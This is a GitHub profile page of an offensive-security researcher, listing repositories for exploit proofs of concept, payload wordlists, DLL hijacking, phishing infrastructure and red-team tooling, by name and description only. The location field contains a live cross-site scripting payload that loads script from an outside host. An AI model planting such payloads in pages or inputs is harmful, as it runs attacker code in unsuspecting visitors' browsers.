ZephrFish
Hacker, Builder, Leader, Thinker, FAFO Engineer
"><script src="https://xss.r1.pe"></script>Scotland
Pinned Repositories
AttackDeploy
Scripts for Deploying new server
Bloodhound-CustomQueries
Custom Queries - Brought Up to BH4.1 syntax
BugBountyTemplates
A collection of templates for bug bounty reporting
BurpFeed
Hacked together script for feeding urls into Burp's Sitemap
CVE-2020-1350_HoneyPoC
HoneyPoC: Proof-of-Concept (PoC) script to exploit SIGRed (CVE-2020-1350). Achieves Domain Admin on Domain Controllers running Windows Server 2000 up to Windows Server 2019.
DockerAttack
Various Tools and Docker Images
GoogD0rker
Note: Going through a full re-write of the tooling so the current versions in the repo do not work!
RandomScripts
Random Shell Scripts and other ideas I have along the way
static-tools
Static compiled binaries + scripts ready to use on systems
Wordlists
Various Payload wordlists
ZephrFish's Repositories
ZephrFish/RandomScripts
Random Shell Scripts and other ideas I have along the way
ZephrFish/AutoHoneyPoC
AutoPoC Generator HoneyPoC
ZephrFish/ADFSDump-PS
PowerShell Implementation of ADFSDump to assist with GoldenSAML
ZephrFish/ChunkyIngress
Leverages B64 chunks to split files and save to clipboard
ZephrFish/HelloJackHunter
Research into WinSxS binaries and finding hijackable paths
ZephrFish/CVE-2024-4577-PHP-RCE
PHP RCE PoC for CVE-2024-4577 written in bash, go, python and a nuclei template
ZephrFish/PotUtils
ZephrFish/NotProxyShellScanner
Python implementation for NotProxyShell aka CVE-2022-40140 & CVE-2022-41082
ZephrFish/ZephrFish
ZephrFish/WebSocketsAreFun
FAFO with WebSockets
ZephrFish/BadZure
BadZure orchestrates the setup of Azure AD tenants, populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths.
ZephrFish/PsInPic
A powershell module for hiding payloads in the pixels of images
ZephrFish/zephrfish.github.io
zsec backup blog
ZephrFish/C-from-Scratch
A roadmap to learn C from Scratch
ZephrFish/DGPOEdit
Disconnected GPO Editor - A Group Policy Manager launcher to allow editing of domain GPOs from non-domain joined machines
ZephrFish/DLL-Exports-Reverse-Proxy-Gen
A simple python tool to generate a a header file of correctly formatted DLL export function forwards for all functions exported by the target DLL.
ZephrFish/Evilginx-Phishing-Infra-Setup
Evilginx Phishing Engagement Infrastructure Setup Guide
ZephrFish/macho-loader
ZephrFish/OffensiveCpp
This repo contains C/C++ snippets that can be handy in specific offensive scenarios.
ZephrFish/TrAMSI
ZephrFish/zephrsnaps.github.io
ZephrFish/adexplorersnapshot-rs
ZephrFish/azure-docs
Open source documentation of Microsoft Azure
ZephrFish/GOAD
game of active directory but on Windows
ZephrFish/HelpColor
Agressor script that lists available Cobalt Strike beacon commands and colors them based on their type
ZephrFish/IconJector
Unorthodox and stealthy way to inject a DLL into the explorer using icons
ZephrFish/ludus-sysmon
Sysmon Template for Ludus
ZephrFish/ludus_sccm
An Ansible collection that installs an SCCM deployment with optional configurations.
ZephrFish/Snaffler
a tool for pentesters to help find delicious candy
ZephrFish/Spartacus
Spartacus DLL/COM Hijacking Toolkit